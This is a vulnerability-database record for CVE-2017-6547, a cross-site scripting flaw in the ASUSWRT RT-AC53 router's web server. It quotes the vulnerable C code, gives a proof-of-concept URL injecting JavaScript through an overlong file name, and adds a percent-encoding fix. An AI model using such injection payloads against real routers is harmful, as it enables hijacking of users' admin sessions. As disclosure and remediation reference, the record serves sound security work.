ID
VAR-E-201703-0071
CVE
| cve_id: | CVE-2017-6547 | Trust: 1.8 |
| cve_id: | CVE-2017-6549 | Trust: 0.8 |
| cve_id: | CVE-2017-6548 | Trust: 0.3 |
EDB ID
41571
TITLE
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Cross-Site Scripting. CVE-2017-6547. Webapps exploit for Hardware platform.
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | asuswrt | model: | rt-ac53 | scope: | eq | version: | (3.0.0.4.380.6038) | Trust: 1.6 |
| vendor: | asus | model: | wrt cross site scripting nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | wrt session hijacking nmap nse script | scope: | - | version: | - | Trust: 0.5 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 3.0.0.4.380.6038 | Trust: 0.3 |
| vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
Cross-Site Scripting (XSS)
Component: httpd
CVE: CVE-2017-6547
Vulnerability:
In the function handle_request, httpd checks whether the requested file name is longer than 50 characters. If it is, httpd responds with a redirect page that embeds the file name without escaping, which allows an attacker to inject arbitrary JavaScript code into the router’s web interface context.
...
if (strlen(file) > 50 && !(strstr(file, "findasus")) && !(strstr(file, "acme-challenge")))
{
    char inviteCode[256];
    /* file comes from the request and is copied unescaped into a JS string literal */
    snprintf(inviteCode, sizeof(inviteCode), "<script>location.href='/cloud_sync.asp?flag=%s';</script>", file);
    send_page(200, "OK", (char *)0, inviteCode, 0);
...
PoC:
http://192.168.1.1/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';alert('XSS');'A
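Mitigation sketch (an added example, not code from the advisory or from ASUSWRT): the same redirect page built from a percent-encoded file name, so the value cannot close the JavaScript string literal or the script element. The names url_encode and build_redirect_page and the buffer sizes are hypothetical, and it assumes the page that reads the flag parameter URL-decodes it.

```c
#include <stdio.h>
#include <string.h>

/* Percent-encode every byte that is not an RFC 3986 unreserved character,
 * so quotes, angle brackets and backslashes cannot end the JS string literal
 * or the <script> element. Returns 0 on success, -1 if dst is too small. */
static int url_encode(const char *src, char *dst, size_t dstlen)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;

    for (; *src; src++) {
        unsigned char c = (unsigned char)*src;
        int unreserved = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                         (c >= '0' && c <= '9') ||
                         c == '-' || c == '.' || c == '_' || c == '~';
        if (unreserved) {
            if (o + 1 >= dstlen) return -1;
            dst[o++] = (char)c;
        } else {
            if (o + 3 >= dstlen) return -1;
            dst[o++] = '%';
            dst[o++] = hex[c >> 4];
            dst[o++] = hex[c & 0x0F];
        }
    }
    dst[o] = '\0';
    return 0;
}

/* Hypothetical replacement for the snprintf() call in the excerpt:
 * builds the same redirect page, but from the encoded file name.
 * Fails closed (-1) instead of emitting a truncated page. */
int build_redirect_page(const char *file, char *page, size_t pagelen)
{
    char enc[3 * 256 + 1];   /* assumed upper bound on the encoded name */
    int n;

    if (url_encode(file, enc, sizeof(enc)) != 0)
        return -1;
    n = snprintf(page, pagelen,
                 "<script>location.href='/cloud_sync.asp?flag=%s';</script>",
                 enc);
    return (n < 0 || (size_t)n >= pagelen) ? -1 : 0;
}
```

On failure the caller should send an error response rather than the page buffer; a plain HTTP redirect with the encoded value in the Location header would avoid the inline script altogether.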
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Cross-Site Scripting
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | xss | Trust: 0.5 |
CREDITS
Bruno Bierbaumer
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-6547 | Trust: 1.8 |
| db: | EXPLOIT-DB | id: | 41571 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6549 | Trust: 0.8 |
| db: | EDBNET | id: | 91798 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 142066 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 142065 | Trust: 0.5 |
| db: | NVD | id: | CVE-2017-6548 | Trust: 0.3 |
| db: | BID | id: | 96938 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6547 | Trust: 1.5 |
| url: | https://bierbaumer.net/security/asuswrt/ | Trust: 1.3 |
| url: | https://www.exploit-db.com/exploits/41571/ | Trust: 0.6 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6549 | Trust: 0.5 |
| url: | https://www.asus.com/asuswrt/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 96938 |
| db: | PACKETSTORM | id: | 142066 |
| db: | PACKETSTORM | id: | 142065 |
| db: | EXPLOIT-DB | id: | 41571 |
| db: | EDBNET | id: | 91798 |
LAST UPDATE DATE
2022-07-27T09:11:32.526000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 96938 | date: | 2017-03-23T00:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 96938 | date: | 2017-03-09T00:00:00 |
| db: | PACKETSTORM | id: | 142066 | date: | 2017-04-07T17:32:22 |
| db: | PACKETSTORM | id: | 142065 | date: | 2017-04-07T13:33:33 |
| db: | EXPLOIT-DB | id: | 41571 | date: | 2017-03-08T00:00:00 |
| db: | EDBNET | id: | 91798 | date: | 2017-03-10T00:00:00 |